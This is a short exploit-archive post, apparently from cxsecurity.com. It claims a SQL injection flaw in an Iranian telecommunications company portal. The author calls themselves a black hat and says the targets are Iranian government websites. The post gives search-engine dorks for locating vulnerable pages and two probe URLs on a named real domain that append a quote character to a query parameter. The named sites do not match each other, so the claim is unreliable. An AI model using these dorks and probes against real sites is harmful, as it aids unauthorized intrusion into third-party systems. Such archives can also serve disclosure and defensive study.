Telecommunication Infrastructure Company Portal SQL INJECT Vulnerabilities

2018.03.25
ir E1.Coders (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################################################################################################################### # # # Exploit Title : Telecommunication Infrastructure Company Portal SQL INJECT Vulnerabilities # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : www.tic.ir # # # # Security Risk : Medium # # # # Description : All target's Iranian GOVERMENT websites # # # # DorK : "site:stats.tic.ir inurl:index.php?id=1" # # DorK : "site:stats.tic.ir inurl:?id=1" # # # ######################################################################################################################### # # # Expl0iTs: # # # # 1: https://www.mci.ir/Notrino-Comics?story=1' # # # # 2: https://www.mci.ir/Notrino-Comics?story=2' # # # ######################################################################################################################### # # # | Security Is JOCK | # # # # | Russian Black Hat | # # # #########################################################################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top